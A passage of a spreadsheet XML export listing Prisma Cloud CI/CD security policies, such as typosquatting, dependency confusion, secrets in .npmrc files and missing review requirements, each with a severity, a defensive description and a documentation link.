        </is>
      </c>
      <c r="P239" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q239" t="inlineStr"/>
      <c r="R239" t="inlineStr"/>
      <c r="S239" t="inlineStr"/>
      <c r="T239" t="b">
        <v>0</v>
      </c>
      <c r="U239" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V239" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W239" t="inlineStr">
        <is>
          <t>Typosquatting attacks involve the registration of malicious packages in public registries, using names that closely resemble popular or internal packages used by an organization. The objective is to exploit users' mistakes when typing package names, resulting in the unintentional download of the malicious package. Running malicious packages on developers endpoints or in CI pipelines can lead to credential theft, source code leakage, code tampering and more.</t>
        </is>
      </c>
      <c r="X239" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-possible-python-typosquat-repo</t>
        </is>
      </c>
      <c r="Y239" t="inlineStr"/>
      <c r="Z239" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA239" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB239" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC239" t="inlineStr"/>
      <c r="AD239" t="b">
        <v>1</v>
      </c>
      <c r="AE239" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF239" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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9" t="inlineStr">
        <is>
          <t>80e0813b-9831-47b1-b3a0-13eb14c2a1b2</t>
        </is>
      </c>
      <c r="AI239" t="inlineStr"/>
      <c r="AJ239" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK239" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" t="inlineStr"/>
      <c r="B240" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C240" s="2" t="inlineStr"/>
      <c r="D240" t="inlineStr"/>
      <c r="E240" t="inlineStr"/>
      <c r="F240" t="inlineStr"/>
      <c r="G240" t="b">
        <v>1</v>
      </c>
      <c r="H2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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J240" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K240" t="inlineStr">
        <is>
          <t>NPM project contains unused dependencies in a GitHub repository</t>
        </is>
      </c>
      <c r="L240" t="inlineStr"/>
      <c r="M240" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N240" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O240" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P240" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q240" t="inlineStr"/>
      <c r="R240" t="inlineStr"/>
      <c r="S240" t="inlineStr"/>
      <c r="T240" t="b">
        <v>0</v>
      </c>
      <c r="U240" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V240" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W240" t="inlineStr">
        <is>
          <t>NPM dependencies can potentially execute code during installation. Each added dependency expands the attack surface. Unused dependencies elevate the risk, as they unnecessarily widen the attack surface of a project without valid justification. An unused and compromised dependency exposes the project to unnecessary risks, potentially allowing malicious code to run on developers' endpoints, during build, or in production.</t>
        </is>
      </c>
      <c r="X240" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-repo-npm-project-unused-dependencies</t>
        </is>
      </c>
      <c r="Y240" t="inlineStr"/>
      <c r="Z240" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA240" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB240" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC240" t="inlineStr"/>
      <c r="AD240" t="b">
        <v>1</v>
      </c>
      <c r="AE240" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF240" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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0" t="inlineStr">
        <is>
          <t>347f498d-6a58-4523-b8ae-738594cdc293</t>
        </is>
      </c>
      <c r="AI240" t="inlineStr"/>
      <c r="AJ240" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK240" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" t="inlineStr"/>
      <c r="B241" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C241" s="2" t="inlineStr"/>
      <c r="D241" t="inlineStr"/>
      <c r="E241" t="inlineStr"/>
      <c r="F241" t="inlineStr"/>
      <c r="G241" t="b">
        <v>1</v>
      </c>
      <c r="H2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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J241" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K241" t="inlineStr">
        <is>
          <t>Missing '.npmrc' file in Bitbucket repository</t>
        </is>
      </c>
      <c r="L241" t="inlineStr"/>
      <c r="M241" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N241" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O241" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P241" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q241" t="inlineStr"/>
      <c r="R241" t="inlineStr"/>
      <c r="S241" t="inlineStr"/>
      <c r="T241" t="b">
        <v>0</v>
      </c>
      <c r="U241" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V241" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W241" t="inlineStr">
        <is>
          <t>The .npmrc file is a configuration file used by npm, the Node Package Manager, to manage settings and options related to package installation and publishing. Failing to store the .npmrc file in the repository can make the project vulnerable during pipelines to both dependency confusion, by allowing an internal package to be fetched from the public registry, as well as insecure use of credentials.</t>
        </is>
      </c>
      <c r="X241" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-missing-npmrc-file</t>
        </is>
      </c>
      <c r="Y241" t="inlineStr"/>
      <c r="Z241" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA241" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB241" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC241" t="inlineStr"/>
      <c r="AD241" t="b">
        <v>1</v>
      </c>
      <c r="AE241" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF241" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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1" t="inlineStr">
        <is>
          <t>208d3272-8a4b-46eb-af51-e6b917999bb0</t>
        </is>
      </c>
      <c r="AI241" t="inlineStr"/>
      <c r="AJ241" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK241" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" t="inlineStr"/>
      <c r="B242" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C242" s="2" t="inlineStr"/>
      <c r="D242" t="inlineStr"/>
      <c r="E242" t="inlineStr"/>
      <c r="F242" t="inlineStr"/>
      <c r="G242" t="b">
        <v>1</v>
      </c>
      <c r="H2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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J242" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K242" t="inlineStr">
        <is>
          <t>Internal NPM package is not scoped in GitHub repository</t>
        </is>
      </c>
      <c r="L242" t="inlineStr"/>
      <c r="M242" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N242" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O242" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P242" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q242" t="inlineStr"/>
      <c r="R242" t="inlineStr"/>
      <c r="S242" t="inlineStr"/>
      <c r="T242" t="b">
        <v>0</v>
      </c>
      <c r="U242" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V242" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W242" t="inlineStr">
        <is>
          <t>Any third party can publish unscoped packages to the public NPM registry. If the organization does not own the names of the internal packages on the public registry, attackers could potentially upload malicious packages to the registry with identical or similar names, hoping that clients who have not configured their `.npmrc` files to fetch packages from the internal registry will mistakenly download them. Scoping packages in NPM can help protect against \"Dependency Confusion\" and Typosquatting attacks. This is because each NPM user/organization has their own scope, and only the user/organization`s owner can add packages to that scope. As a result, third parties cannot take the package name. Note: The package source displayed in the event field can be specified using one of the following methods described in these examples: • URL: https://registry.npmjs.org/example/-/example-1.0.0.tgz • Git URL: git+ssh://git@github.com/org/repo.git • Local file path: file:../foo/bar • Local linked package: folder/package</t>
        </is>
      </c>
      <c r="X242" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-internal-npmpack-notscoped</t>
        </is>
      </c>
      <c r="Y242" t="inlineStr"/>
      <c r="Z242" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA242" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB242" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC242" t="inlineStr"/>
      <c r="AD242" t="b">
        <v>1</v>
      </c>
      <c r="AE242" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF242" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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2" t="inlineStr">
        <is>
          <t>dd6aa4ef-a33e-4050-a434-4ea15e6d3a85</t>
        </is>
      </c>
      <c r="AI242" t="inlineStr"/>
      <c r="AJ242" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK242" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" t="inlineStr"/>
      <c r="B243" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C243" s="2" t="inlineStr"/>
      <c r="D243" t="inlineStr"/>
      <c r="E243" t="inlineStr"/>
      <c r="F243" t="inlineStr"/>
      <c r="G243" t="b">
        <v>1</v>
      </c>
      <c r="H2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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J243" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K243" t="inlineStr">
        <is>
          <t>Deprecated package used in NPM project of an Azure repository</t>
        </is>
      </c>
      <c r="L243" t="inlineStr"/>
      <c r="M243" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N243" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O243" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P243" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q243" t="inlineStr"/>
      <c r="R243" t="inlineStr"/>
      <c r="S243" t="inlineStr"/>
      <c r="T243" t="b">
        <v>0</v>
      </c>
      <c r="U243" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V243" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W243" t="inlineStr">
        <is>
          <t>Deprecated packages can pose security risks to the project such as code vulnerabilities that can be discovered overtime and malicious package takeover due to configuration that change over time like the maintainer's email domain expiring.</t>
        </is>
      </c>
      <c r="X243" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-deprecated-package-in-npm</t>
        </is>
      </c>
      <c r="Y243" t="inlineStr"/>
      <c r="Z243" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA243" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB243" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC243" t="inlineStr"/>
      <c r="AD243" t="b">
        <v>1</v>
      </c>
      <c r="AE243" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF243" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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3" t="inlineStr">
        <is>
          <t>431ec003-b3d7-4e4d-900f-89ba22a818a1</t>
        </is>
      </c>
      <c r="AI243" t="inlineStr"/>
      <c r="AJ243" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK243" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" t="inlineStr"/>
      <c r="B244" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C244" s="2" t="inlineStr"/>
      <c r="D244" t="inlineStr"/>
      <c r="E244" t="inlineStr"/>
      <c r="F244" t="inlineStr"/>
      <c r="G244" t="b">
        <v>1</v>
      </c>
      <c r="H2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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J244" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K244" t="inlineStr">
        <is>
          <t>Secret exposed in proxy URL within '.npmrc' file of a Gitlab repository</t>
        </is>
      </c>
      <c r="L244" t="inlineStr"/>
      <c r="M244" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N244" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O244" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P244" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q244" t="inlineStr"/>
      <c r="R244" t="inlineStr"/>
      <c r="S244" t="inlineStr"/>
      <c r="T244" t="b">
        <v>0</v>
      </c>
      <c r="U244" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V244" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W244" t="inlineStr">
        <is>
          <t>Including secrets in a .npmrc file can expose them to attackers who have gained unauthorized access to the repository, allowing them to use those secrets to access protected resources. For example, an attacker could use a secret that is used in a proxy configuration, such as the proxy or https-proxy keys, to access a proxy server and then use the proxy server to access restricted organization assets, such as an internal package registry.</t>
        </is>
      </c>
      <c r="X244" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-secrets-exposed-proxyurl-npmrc</t>
        </is>
      </c>
      <c r="Y244" t="inlineStr"/>
      <c r="Z244" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA244" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB244" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC244" t="inlineStr"/>
      <c r="AD244" t="b">
        <v>1</v>
      </c>
      <c r="AE244" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF244" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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4" t="inlineStr">
        <is>
          <t>dc8b8478-8ad3-4fca-9601-8760ff48a9cb</t>
        </is>
      </c>
      <c r="AI244" t="inlineStr"/>
      <c r="AJ244" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK244" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" t="inlineStr"/>
      <c r="B245" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C245" s="2" t="inlineStr"/>
      <c r="D245" t="inlineStr"/>
      <c r="E245" t="inlineStr"/>
      <c r="F245" t="inlineStr"/>
      <c r="G245" t="b">
        <v>1</v>
      </c>
      <c r="H2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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J245" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K245" t="inlineStr">
        <is>
          <t>Potential dependency confusion in a GitLab repository due to package name or scope available in registry</t>
        </is>
      </c>
      <c r="L245" t="inlineStr"/>
      <c r="M245" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N245" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O245" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P245" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q245" t="inlineStr"/>
      <c r="R245" t="inlineStr"/>
      <c r="S245" t="inlineStr"/>
      <c r="T245" t="b">
        <v>0</v>
      </c>
      <c r="U245" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V245" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W245" t="inlineStr">
        <is>
          <t>Attackers can discover internal package names by scanning public repositories and artifacts. Then they can upload malicious packages with names identical to an organization's internal package names and scopes, hoping that improper package fetching configuration will cause internal clients to fetch the malicious package rather than the legitimate internal package with the same name. This is known as a Dependency Confusion attack.</t>
        </is>
      </c>
      <c r="X245" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-potential-dependency-confusion</t>
        </is>
      </c>
      <c r="Y245" t="inlineStr"/>
      <c r="Z245" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA245" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB245" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC245" t="inlineStr"/>
      <c r="AD245" t="b">
        <v>1</v>
      </c>
      <c r="AE245" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF245" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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5" t="inlineStr">
        <is>
          <t>c6ec242a-ef00-43aa-8d93-f9037ae64876</t>
        </is>
      </c>
      <c r="AI245" t="inlineStr"/>
      <c r="AJ245" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK245" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" t="inlineStr"/>
      <c r="B246" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C246" s="2" t="inlineStr"/>
      <c r="D246" t="inlineStr"/>
      <c r="E246" t="inlineStr"/>
      <c r="F246" t="inlineStr"/>
      <c r="G246" t="b">
        <v>1</v>
      </c>
      <c r="H2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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J246" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K246" t="inlineStr">
        <is>
          <t>Secrets found in NPM dependency download URL in GitLab repository</t>
        </is>
      </c>
      <c r="L246" t="inlineStr"/>
      <c r="M246" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N246" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O246" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P246" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q246" t="inlineStr"/>
      <c r="R246" t="inlineStr"/>
      <c r="S246" t="inlineStr"/>
      <c r="T246" t="b">
        <v>0</v>
      </c>
      <c r="U246" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V246" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W246" t="inlineStr">
        <is>
          <t>Including secrets in a NPM dependency download URL, which is found in the package-lock.json file, can allow an attacker who has gained access to the repository to gain unauthorized access to the package or to resources that are protected by the secret. The attacker could potentially use these secrets to impersonate the owner of the secret and to perform actions on their behalf, such as pushing malicious code which could reach the production environment.</t>
        </is>
      </c>
      <c r="X246" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-secrets-npm-downloadurl</t>
        </is>
      </c>
      <c r="Y246" t="inlineStr"/>
      <c r="Z246" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA246" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB246" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC246" t="inlineStr"/>
      <c r="AD246" t="b">
        <v>1</v>
      </c>
      <c r="AE246" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF246" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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6" t="inlineStr">
        <is>
          <t>30193801-9ad9-4b19-baff-6cec2b8755cd</t>
        </is>
      </c>
      <c r="AI246" t="inlineStr"/>
      <c r="AJ246" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK246" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" t="inlineStr"/>
      <c r="B247" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C247" s="2" t="inlineStr"/>
      <c r="D247" t="inlineStr"/>
      <c r="E247" t="inlineStr"/>
      <c r="F247" t="inlineStr"/>
      <c r="G247" t="b">
        <v>1</v>
      </c>
      <c r="H2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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J247" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K247" t="inlineStr">
        <is>
          <t>NPM project contains unused dependencies in a GitLab repository</t>
        </is>
      </c>
      <c r="L247" t="inlineStr"/>
      <c r="M247" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N247" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O247" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P247" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q247" t="inlineStr"/>
      <c r="R247" t="inlineStr"/>
      <c r="S247" t="inlineStr"/>
      <c r="T247" t="b">
        <v>0</v>
      </c>
      <c r="U247" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V247" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W247" t="inlineStr">
        <is>
          <t>NPM dependencies can potentially execute code during installation. Each added dependency expands the attack surface. Unused dependencies elevate the risk, as they unnecessarily widen the attack surface of a project without valid justification. An unused and compromised dependency exposes the project to unnecessary risks, potentially allowing malicious code to run on developers' endpoints, during build, or in production.</t>
        </is>
      </c>
      <c r="X247" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-repo-npm-project-unused-dependencies</t>
        </is>
      </c>
      <c r="Y247" t="inlineStr"/>
      <c r="Z247" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA247" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB247" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC247" t="inlineStr"/>
      <c r="AD247" t="b">
        <v>1</v>
      </c>
      <c r="AE247" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF247" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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7" t="inlineStr">
        <is>
          <t>5e662e88-df08-4e1f-83e9-96e419dc3622</t>
        </is>
      </c>
      <c r="AI247" t="inlineStr"/>
      <c r="AJ247" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK247" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" t="inlineStr"/>
      <c r="B248" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C248" s="2" t="inlineStr"/>
      <c r="D248" t="inlineStr"/>
      <c r="E248" t="inlineStr"/>
      <c r="F248" t="inlineStr"/>
      <c r="G248" t="b">
        <v>1</v>
      </c>
      <c r="H2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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J248" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K248" t="inlineStr">
        <is>
          <t>Reviews in GitHub may no longer be required before merging</t>
        </is>
      </c>
      <c r="L248" t="inlineStr"/>
      <c r="M248" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N248" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O248" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P248" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q248" t="inlineStr"/>
      <c r="R248" t="inlineStr"/>
      <c r="S248" t="inlineStr"/>
      <c r="T248" t="b">
        <v>0</v>
      </c>
      <c r="U248" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V248" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W248" t="inlineStr">
        <is>
          <t>Removing code reviews from protected branches eliminates an essential security measure designed to prevent unreviewed code that may contain security bugs and/or malicious commits being pushed to repository branches.</t>
        </is>
      </c>
      <c r="X248" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-reviews-not-require-merge</t>
        </is>
      </c>
      <c r="Y248" t="inlineStr"/>
      <c r="Z248" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA248" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB248" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC248" t="inlineStr"/>
      <c r="AD248" t="b">
        <v>1</v>
      </c>
      <c r="AE248" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF248" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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8" t="inlineStr">
        <is>
          <t>a8260c96-4296-46ba-9874-1c9e1278d895</t>
        </is>
      </c>
      <c r="AI248" t="inlineStr"/>
      <c r="AJ248" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK248" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" t="inlineStr"/>
      <c r="B249" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C249" s="2" t="inlineStr"/>
      <c r="D249" t="inlineStr"/>
      <c r="E249" t="inlineStr"/>
      <c r="F249" t="inlineStr"/>
      <c r="G249" t="b">
        <v>1</v>
      </c>
      <c r="H2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9" t="inlineStr">
